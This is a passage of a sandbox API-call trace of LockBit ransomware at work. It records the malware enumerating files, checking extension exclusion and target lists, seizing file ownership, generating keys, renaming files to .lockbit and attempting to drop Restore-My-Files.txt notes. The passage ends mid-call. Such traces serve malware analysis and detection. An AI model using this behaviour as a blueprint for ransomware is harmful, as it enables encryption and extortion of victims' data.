1 [0085.045] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.lockbit") returned 80 [0085.045] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.046] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.046] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.046] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.046] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.046] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.046] RtlFreeAnsiString (AnsiString="\\") [0085.047] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0085.047] malloc (_Size=0x200) returned 0x77d800 [0085.047] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.047] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.047] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.047] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.047] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.048] CloseHandle (hObject=0x3ac) returned 1 [0085.048] free (_Block=0x77d800) [0085.048] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.048] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.048] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.049] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5372) returned 1 [0085.049] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.051] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.058] malloc (_Size=0xb6) returned 0x77d800 [0085.058] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0085.059] free (_Block=0x77d800) [0085.059] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.059] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.059] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.059] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8601df, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8601df, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1274, dwReserved0=0x520150, dwReserved1=0x0, cFileName="photoedge_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0085.059] lstrcmpiW (lpString1=".", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.059] lstrcmpiW (lpString1="..", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.059] PathFindExtensionW (pszPath="photoedge_selectionsubpicture.png") returned=".png" [0085.059] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.059] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.059] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.059] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.059] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.060] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.060] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.060] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.060] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.061] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.061] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.062] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.062] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.062] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.062] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.062] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.062] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="photoedge_selectionsubpicture.png") returned 1 [0085.062] lstrcmpiW (lpString1="ntldr", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.062] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.062] lstrcmpiW (lpString1="bootsect.bak", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.062] lstrcmpiW (lpString1="autorun.inf", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.062] lstrcmpiW (lpString1="thumbs.db", lpString2="photoedge_selectionsubpicture.png") returned 1 [0085.062] lstrcmpiW (lpString1="iconcache.db", lpString2="photoedge_selectionsubpicture.png") returned -1 [0085.062] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.062] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned=".png" [0085.062] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.062] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.062] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.063] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.064] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.064] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.lockbit") returned 86 [0085.064] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.065] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.065] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.065] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.065] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.066] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.066] RtlFreeAnsiString (AnsiString="\\") [0085.066] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0085.066] malloc (_Size=0x200) returned 0x77d800 [0085.066] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.066] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.066] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.066] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.067] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.067] CloseHandle (hObject=0x3c0) returned 1 [0085.067] free (_Block=0x77d800) [0085.068] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.068] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.068] malloc (_Size=0x40068) returned 0x2031ed0 [0085.069] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4724) returned 1 [0085.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0085.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0085.071] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.083] malloc (_Size=0xc2) returned 0x77d800 [0085.083] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0085.083] free (_Block=0x77d800) [0085.083] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.083] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.083] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.084] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e88633c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e88633c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0x520150, dwReserved1=0x0, cFileName="photoedge_videoinset.png", cAlternateFileName="")) returned 1 [0085.084] lstrcmpiW (lpString1=".", lpString2="photoedge_videoinset.png") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="photoedge_videoinset.png") returned -1 [0085.084] PathFindExtensionW (pszPath="photoedge_videoinset.png") returned=".png" [0085.084] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.084] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.084] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.085] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.085] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.085] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.085] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.085] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.085] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.086] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.086] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.086] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.086] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.086] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.086] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="photoedge_videoinset.png") returned 1 [0085.086] lstrcmpiW (lpString1="ntldr", lpString2="photoedge_videoinset.png") returned -1 [0085.086] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="photoedge_videoinset.png") returned -1 [0085.086] lstrcmpiW (lpString1="bootsect.bak", lpString2="photoedge_videoinset.png") returned -1 [0085.086] lstrcmpiW (lpString1="autorun.inf", lpString2="photoedge_videoinset.png") returned -1 [0085.087] lstrcmpiW (lpString1="thumbs.db", lpString2="photoedge_videoinset.png") returned 1 [0085.087] lstrcmpiW (lpString1="iconcache.db", lpString2="photoedge_videoinset.png") returned -1 [0085.087] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.087] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned=".png" [0085.087] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.087] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.087] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.087] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.088] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.088] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.088] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.lockbit") returned 77 [0085.088] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.089] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.089] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.089] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.090] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.090] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.090] RtlFreeAnsiString (AnsiString="\\") [0085.090] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0085.090] malloc (_Size=0x200) returned 0x77d800 [0085.090] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.090] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.090] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: 